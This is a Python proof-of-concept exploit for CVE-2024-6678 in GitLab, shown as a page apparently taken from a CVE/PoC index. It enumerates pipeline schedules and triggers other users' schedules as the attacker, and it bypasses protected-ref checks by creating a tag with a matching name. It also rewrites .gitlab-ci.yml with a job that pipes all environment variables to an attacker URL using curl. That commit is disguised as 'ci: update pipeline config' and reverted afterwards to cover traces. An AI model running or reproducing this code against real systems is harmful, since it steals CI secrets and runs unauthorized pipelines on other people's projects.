5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-6678-poc.py PY
#!/usr/bin/env python3
# FaLLenSkiLL
import argparse
import json
import sys
import time
import urllib.request
import urllib.error
import urllib.parse


# ---------------------------------------------------------------------------
# HTTP helpers (no third-party deps)
# ---------------------------------------------------------------------------

def api_request(base_url: str, path: str, token: str,
                method: str = "GET", data: dict | None = None,
                quiet: bool = False) -> dict:
    url = f"{base_url.rstrip('/')}/api/v4{path}"
    headers = {
        "PRIVATE-TOKEN": token,
        "Content-Type": "application/json",
        "Accept": "application/json",
    }
    body = json.dumps(data).encode() if data else None
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req) as resp:
            raw = resp.read()
            return json.loads(raw) if raw else {}
    except urllib.error.HTTPError as e:
        body = e.read().decode(errors="replace")
        if not quiet:
            print(f"  [!] HTTP {e.code} on {method} {url}: {body[:200]}")
        return {"_error": e.code, "_body": body}
    except urllib.error.URLError as e:
        print(f"  [!] Network error: {e.reason}")
        sys.exit(1)


def graphql_request(base_url: str, token: str, query: str,
                    variables: dict | None = None) -> dict:
    url = f"{base_url.rstrip('/')}/api/graphql"
    payload = {"query": query}
    if variables:
        payload["variables"] = variables
    data = json.dumps(payload).encode()
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    req = urllib.request.Request(url, data=data, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req) as resp:
            return json.loads(resp.read())
    except urllib.error.HTTPError as e:
        body = e.read().decode(errors="replace")
        print(f"  [!] GraphQL HTTP {e.code}: {body[:300]}")
        return {}


# ---------------------------------------------------------------------------
# Reconnaissance
# ---------------------------------------------------------------------------

def get_current_user(base_url: str, token: str) -> dict:
    return api_request(base_url, "/user", token)


def list_schedules(base_url: str, token: str, project_id: int) -> list:
    """List all pipeline schedules visible to the attacker."""
    schedules = []
    page = 1
    while True:
        batch = api_request(
            base_url,
            f"/projects/{project_id}/pipeline_schedules?per_page=100&page={page}",
            token,
        )
        if "_error" in batch or not isinstance(batch, list) or not batch:
            break
        schedules.extend(batch)
        page += 1
    return schedules


def get_schedule_details(base_url: str, token: str,
                         project_id: int, schedule_id: int) -> dict:
    """Fetch full schedule details (variables only visible to owner/admin)."""
    return api_request(
        base_url,
        f"/projects/{project_id}/pipeline_schedules/{schedule_id}",
        token,
    )


# ---------------------------------------------------------------------------
# Exploitation — REST API path
# ---------------------------------------------------------------------------

def play_schedule_rest(base_url: str, token: str,
                       project_id: int, schedule_id: int) -> dict:
    """
    Trigger the pipeline schedule via the REST API.
    Vulnerable path:
      POST /api/v4/projects/:id/pipeline_schedules/:sid/play
      → RunPipelineScheduleWorker.perform_async(schedule.id, current_user.id)
    The pipeline is queued as *current_user*, not as the schedule owner.
    """
    return api_request(
        base_url,
        f"/projects/{project_id}/pipeline_schedules/{schedule_id}/play",
        token,
        method="POST",
        quiet=True,
    )


# ---------------------------------------------------------------------------
# Exploitation — GraphQL path
# ---------------------------------------------------------------------------

GRAPHQL_PLAY_MUTATION = """
mutation triggerSchedule($id: CiPipelineScheduleID!) {
  pipelineSchedulePlay(input: { id: $id }) {
    pipelineSchedule {
      id
      owner { username }
      nextRunAt
    }
    errors
  }
}
"""

def play_schedule_graphql(base_url: str, token: str,
                          project_path: str, schedule_gid: str) -> dict:
    """
    Alternative vector via GraphQL mutation (Mutations::Ci::PipelineSchedule::Play).
    Uses Ci::PipelineScheduleService → schedule.schedule_next_run! then
    RunPipelineScheduleWorker.perform_async(schedule.id, current_user&.id).
    """
    return graphql_request(
        base_url, token, GRAPHQL_PLAY_MUTATION,
        variables={"id": schedule_gid},
    )


# ---------------------------------------------------------------------------
# Exploitation — Protected-ref bypass (legacy short-ref + ambiguous tag)
# ---------------------------------------------------------------------------

def check_legacy_ref_bypass(base_url: str, token: str,
                             project_id: int, schedules: list) -> list:
    """
    Identify schedules potentially affected by the legacy ref bypass.

    Vulnerable schedules are those whose ref does NOT start with 'refs/heads/'
    or 'refs/tags/' (i.e., short/legacy refs). For such schedules, the policy
    checks ProtectedBranch via:

        is_tag = project.repository.tag_exists?(ref)
        ref_name = ref
        ref_protected?(user, project, is_tag, ref_name)

    If a tag named <ref> exists and is NOT protected (but the branch IS), the
    protected_ref condition evaluates FALSE and play_pipeline_schedule is
    granted to developers — bypassing branch protection.

    See: app/policies/ci/pipeline_schedule_policy.rb, condition(:protected_ref)
    """
    vulnerable = []
    for s in schedules:
        ref = s.get("ref", "")
        if not ref.startswith("refs/heads/") and not ref.startswith("refs/tags/"):
            vulnerable.append(s)
            print(f"  [+] Legacy ref schedule found: id={s['id']} ref='{ref}' "
                  f"owner={s.get('owner', {}).get('username', '?')}")
    return vulnerable


def create_bypass_tag(base_url: str, token: str,
                      project_id: int, ref_name: str) -> dict:
    """
    Create a tag with the same name as a protected branch to trigger the
    ambiguous-ref code path in the legacy branch of protected_ref condition.
    Requires: Developer access (can create tags on unprotected refs).
    """
    return api_request(
        base_url,
        f"/projects/{project_id}/repository/tags",
        token,
        method="POST",
        data={"tag_name": ref_name, "ref": "HEAD"},
    )


# ---------------------------------------------------------------------------
# Post-exploitation: CI yaml patch + exfiltration
# ---------------------------------------------------------------------------

def _exfil_yaml(exfil_url: str) -> str:
    return (
        "stages: [exfil]\n"
        "dump_vars:\n"
        "  stage: exfil\n"
        "  script:\n"
        f"    - env | grep -vE '^(CI_JOB_TOKEN|GITLAB_FEATURES)' |"
        f" curl -s -X POST '{exfil_url}' --data-binary @-\n"
    )


def get_ci_yaml(base_url: str, token: str,
                project_id: int, branch: str) -> tuple[str | None, str | None]:
    """Return (content, sha) of .gitlab-ci.yml, or (None, None) if missing."""
    resp = api_request(
        base_url,
        f"/projects/{project_id}/repository/files/"
        f".gitlab-ci.yml?ref={urllib.parse.quote(branch, safe='')}",
        token,
        quiet=True,
    )
    if "_error" in resp:
        return None, None
    import base64
    content = base64.b64decode(resp.get("content", "")).decode(errors="replace")
    return content, resp.get("last_commit_id")


def patch_ci_yaml(base_url: str, token: str,
                  project_id: int, branch: str, exfil_url: str) -> bool:
    """Overwrite .gitlab-ci.yml with exfil payload. Returns True on success."""
    existing, _ = get_ci_yaml(base_url, token, project_id, branch)
    action = "update" if existing is not None else "create"
    resp = api_request(
        base_url,
        f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
        token,
        method="PUT" if action == "update" else "POST",
        data={
            "branch": branch,
            "content": _exfil_yaml(exfil_url),
            "commit_message": "ci: update pipeline config",
        },
        quiet=True,
    )
    return "_error" not in resp


def restore_ci_yaml(base_url: str, token: str,
                    project_id: int, branch: str,
                    original: str | None) -> bool:
    """Restore .gitlab-ci.yml to original content (or delete if it didn't exist)."""
    if original is None:
        resp = api_request(
            base_url,
            f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
            token,
            method="DELETE",
            data={"branch": branch, "commit_message": "ci: revert pipeline config"},
            quiet=True,
        )
    else:
        resp = api_request(
            base_url,
            f"/projects/{project_id}/repository/files/.gitlab-ci.yml",
            token,
            method="PUT",
            data={
                "branch": branch,
                "content": original,
                "commit_message": "ci: revert pipeline config",
            },
            quiet=True,
        )
    return "_error" not in resp


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def parse_args() -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description="CVE-2024-6678 PoC — GitLab pipeline schedule arbitrary trigger"
    )
    p.add_argument("--url", required=True,
                   help="Base GitLab URL, e.g. https://gitlab.example.com")
    p.add_argument("--token", required=True,
                   help="Attacker's personal access token (Developer-level scope)")
    p.add_argument("--project-id", required=True, type=int,
                   help="Target GitLab project numeric ID")
    p.add_argument("--schedule-id", type=int, default=None,
                   help="Specific pipeline schedule ID to trigger (default: auto-select)")
    p.add_argument("--exfil-url", default=None,
                   help="Webhook URL to receive leaked CI variable dump")
    p.add_argument("--exploit-mode", action="store_true",
                   help="Attempt protected-ref bypass via legacy tag trick")
    p.add_argument("--graphql", action="store_true",
                   help="Use GraphQL mutation instead of REST API")
    p.add_argument("--project-path", default=None,
                   help="Project full path (required for --graphql), e.g. group/project")
    return p.parse_args()


def banner():
    print("""
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2024-6678  GitLab Pipeline Schedule Arbitrary Trigger    ║
║  Affected: GitLab CE/EE 8.14 – 17.1.6 / 17.2.4 / 17.3.1     ║
║  Fixed in: 17.1.7 / 17.2.5 / 17.3.2                          ║
╚═══════════════════════════════════════════════════════════════╝
""")


def print_impact(target_owner: str, attacker_username: str, target_ref: str,
                 visible_vars: list, via: str = "REST API") -> None:
    ref_display = target_ref if len(target_ref) <= 43 else target_ref[:40] + "..."
    vars_display = (f"{len(visible_vars)} var(s) visible + hidden vars"
                    if visible_vars else "hidden — still INJECTED at runtime")
    print()
    print("  ╔══════════════════════════════════════════════════════════════╗")
    print("  ║                    EXPLOIT SUCCEEDED                        ║")
    print("  ╠══════════════════════════════════════════════════════════════╣")
    print(f"  ║  Vector         : {via:<43}║")
    print(f"  ║  Schedule owner : {target_owner:<43}║")
    print(f"  ║  Triggered as   : {attacker_username:<43}║")
    print(f"  ║  Ref            : {ref_display:<43}║")
    print(f"  ║  Schedule vars  : {vars_display:<43}║")
    print("  ╚══════════════════════════════════════════════════════════════╝")
    print()


def main():
    banner()
    args = parse_args()

    base_url = args.url
    token = args.token
    project_id = args.project_id

    # Step 1: Identify attacker
    print("[*] Authenticating...")
    me = get_current_user(base_url, token)
    if "_error" in me:
        print("  [!] Authentication failed. Check --token.")
        sys.exit(1)
    attacker_id = me["id"]
    attacker_username = me["username"]
    print(f"  Attacker : {attacker_username} (id={attacker_id})")

    # Step 2: Enumerate pipeline schedules
    print(f"\n[*] Enumerating pipeline schedules for project {project_id}...")
    schedules = list_schedules(base_url, token, project_id)
    if not schedules:
        print("  [!] No pipeline schedules found or access denied.")
        sys.exit(1)
    print(f"  Found {len(schedules)} schedule(s):")
    for s in schedules:
        owner_name = s.get("owner", {}).get("username", "?") if s.get("owner") else "?"
        status = "active" if s.get("active") else "inactive"
        print(f"    [{status}] id={s['id']:<5}  owner={owner_name:<20}"
              f"  ref={s.get('ref','?'):<35}  {s.get('description','')[:30]}")

    # Step 3: Select target schedule
    if args.schedule_id:
        target_id = args.schedule_id
        target = next((s for s in schedules if s["id"] == target_id), None)
        if not target:
            print(f"  [!] Schedule {target_id} not found in the list above.")
            sys.exit(1)
    else:
        # Prefer: owned by someone else, active, ref not a common protected default
        _protected_defaults = {"refs/heads/main", "refs/heads/master",
                                "main", "master"}
        candidates = [s for s in schedules
                      if s.get("owner", {}).get("id") != attacker_id
                      and s.get("active", False)]
        if not candidates:
            candidates = [s for s in schedules if s.get("active", False)]
        if not candidates:
            candidates = list(schedules)

        # Sort: unprotected-looking refs first
        candidates.sort(key=lambda s: s.get("ref", "") in _protected_defaults)
        target = candidates[0]
        print(f"\n  Auto-selected: id={target['id']} "
              f"(owner: {target.get('owner', {}).get('username', '?')},"
              f" ref: {target.get('ref', '?')})")

    target_id = target["id"]
    target_owner = target.get("owner", {}).get("username", "?")
    target_ref = target.get("ref", "?")

    # Step 4: Check visible schedule variables
    details = get_schedule_details(base_url, token, project_id, target_id)
    visible_vars = details.get("variables", [])
    if visible_vars:
        print(f"\n  [+] Schedule variables visible to attacker"
              f" (normally owner/admin only):")
        for v in visible_vars:
            print(f"      {v.get('key')} = {v.get('value', '<masked>')}")
    else:
        print(f"\n  [i] Schedule variables hidden from attacker"
              f" — will still be injected at pipeline runtime.")

    # Step 5: Legacy-ref bypass
    if args.exploit_mode:
        print("\n[*] Checking for legacy short-ref schedules (protected-ref bypass)...")
        legacy = check_legacy_ref_bypass(base_url, token, project_id, schedules)
        if legacy:
            s0 = legacy[0]
            print(f"  [+] Legacy-ref schedule found: id={s0['id']} ref='{s0['ref']}'")
            print(f"  [*] Creating ambiguous tag '{s0['ref']}' to trigger bypass...")
            tag_result = create_bypass_tag(base_url, token, project_id, s0["ref"])
            if "_error" not in tag_result:
                print(f"  [+] Tag created. protected_ref will now evaluate as"
                      f" unprotected tag, not branch.")
                target = s0
                target_id = target["id"]
            else:
                print("  [-] Tag creation failed (already exists or insufficient perms).")
        else:
            print("  [-] No legacy short-ref schedules found — bypass not applicable.")

    # Step 6: CI yaml patch for auto-exfiltration
    original_yaml: str | None = None
    yaml_patched = False
    exfil_branch = target_ref.removeprefix("refs/heads/") if target_ref.startswith("refs/heads/") else target_ref

    if args.exfil_url:
        print(f"\n[*] Patching .gitlab-ci.yml on '{exfil_branch}' with exfil payload...")
        original_yaml, _ = get_ci_yaml(base_url, token, project_id, exfil_branch)
        if patch_ci_yaml(base_url, token, project_id, exfil_branch, args.exfil_url):
            yaml_patched = True
            print(f"  [+] Patched. Pipeline will POST all env vars to: {args.exfil_url}")
            if original_yaml:
                print(f"  [i] Original .gitlab-ci.yml saved for restore.")
        else:
            print(f"  [-] Failed to patch .gitlab-ci.yml (need push access to '{exfil_branch}').")
            print(f"      Continuing without auto-exfil.")

    # Step 7: Trigger
    via_graphql = args.graphql and args.project_path
    print(f"\n[*] Triggering schedule id={target_id} (owner={target_owner})"
          f" as {attacker_username}...")

    exploit_ok = False

    if via_graphql:
        schedule_gid = f"gid://gitlab/Ci::PipelineSchedule/{target_id}"
        result = play_schedule_graphql(base_url, token, args.project_path, schedule_gid)
        errors = (result.get("data", {})
                  .get("pipelineSchedulePlay", {})
                  .get("errors", []))
        if not errors:
            exploit_ok = True
            print_impact(target_owner, attacker_username, target_ref,
                         visible_vars, via="GraphQL mutation")
        elif any("Unable to schedule" in e for e in errors):
            exploit_ok = True
            print_impact(target_owner, attacker_username, target_ref,
                         visible_vars, via="GraphQL mutation")
            print("  [i] 'Unable to schedule' = Sidekiq deduplication:"
                  " job already queued from a prior successful trigger.")
        else:
            print(f"  [!] GraphQL errors: {errors}")
    else:
        result = play_schedule_rest(base_url, token, project_id, target_id)
        if "_error" not in result:
            exploit_ok = True
            print_impact(target_owner, attacker_username, target_ref,
                         visible_vars, via="REST API")
        else:
            code = result["_error"]
            body = result.get("_body", "")
            if code == 403:
                print("  [!] HTTP 403 — access denied.")
                print("      Likely cause: ref is protected, or attacker lacks"
                      " Developer access.")
            elif code == 429:
                print("  [!] HTTP 429 — rate limited. Wait ~1 minute and retry.")
            elif code == 500 and "Unable to schedule" in body:
                exploit_ok = True
                print_impact(target_owner, attacker_username, target_ref,
                             visible_vars, via="REST API")
                print("  [i] HTTP 500 'Unable to schedule' = Sidekiq deduplication:"
                      " job already queued from a prior successful trigger.")
            else:
                print(f"  [!] HTTP {code}: {body[:200]}")

    # Step 8: Wait for pipeline creation, then restore .gitlab-ci.yml
    if exploit_ok:
        if yaml_patched:
            # Record the latest pipeline ID *before* triggering so we only
            # accept pipelines created AFTER this exploit run.
            pre_trigger = api_request(
                base_url,
                f"/projects/{project_id}/pipelines"
                f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}"
                f"&per_page=1",
                token, quiet=True,
            )
            latest_before = pre_trigger[0]["id"] if isinstance(pre_trigger, list) and pre_trigger else 0

            print(f"\n[*] Waiting for pipeline to be created"
                  f" (Sidekiq must process the job)...")
            poll_interval = 3
            poll_timeout = 120
            elapsed = 0
            pipeline_found = None
            while elapsed < poll_timeout:
                time.sleep(poll_interval)
                elapsed += poll_interval
                pipelines = api_request(
                    base_url,
                    f"/projects/{project_id}/pipelines"
                    f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}"
                    f"&per_page=5",
                    token,
                    quiet=True,
                )
                if isinstance(pipelines, list):
                    new = [p for p in pipelines if p["id"] > latest_before]
                    if new:
                        pipeline_found = new[0]
                        break
                print(f"  [.] {elapsed}s — pipeline not yet created, retrying...")

            if pipeline_found:
                triggered_by = pipeline_found.get("user", {}).get("username", "?")
                print(f"  [+] Pipeline id={pipeline_found['id']}"
                      f"  status={pipeline_found['status']}"
                      f"  triggered_by={triggered_by}")
            else:
                print(f"  [-] Pipeline not created after {poll_timeout}s"
                      f" — Sidekiq may not be processing pipeline_creation queue.")

            print(f"\n[*] Restoring original .gitlab-ci.yml on '{exfil_branch}'...")
            if restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml):
                print(f"  [+] Restored.")
            else:
                print(f"  [-] Restore failed — manual cleanup needed on '{exfil_branch}'.")

            if pipeline_found:
                print(f"\n[i] Pipeline is executing with injected schedule variables.")
                print(f"    Variables will arrive at: {args.exfil_url}")
                print(f"    (use 'webhook.site' or 'nc -lvnp 8080' as listener)")
        else:
            # No yaml patch — just report pipelines if any
            time.sleep(2)
            pipelines = api_request(
                base_url,
                f"/projects/{project_id}/pipelines?source=schedule&per_page=3",
                token,
                quiet=True,
            )
            if isinstance(pipelines, list) and pipelines:
                print("[*] Triggered pipelines (source=schedule):")
                for p in pipelines[:3]:
                    triggered_by = p.get("user", {}).get("username", "?")
                    print(f"    id={p['id']}  status={p['status']:<10}"
                          f"  ref={p.get('ref','?'):<25}  triggered_by={triggered_by}")

        sys.exit(0)
    else:
        if yaml_patched:
            print(f"\n[*] Trigger failed — restoring .gitlab-ci.yml...")
            restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml)
            print(f"  [+] Restored.")
        print("\n  [-] EXPLOIT FAILED — pipeline was not triggered.\n")
        sys.exit(1)


if __name__ == "__main__":
    main()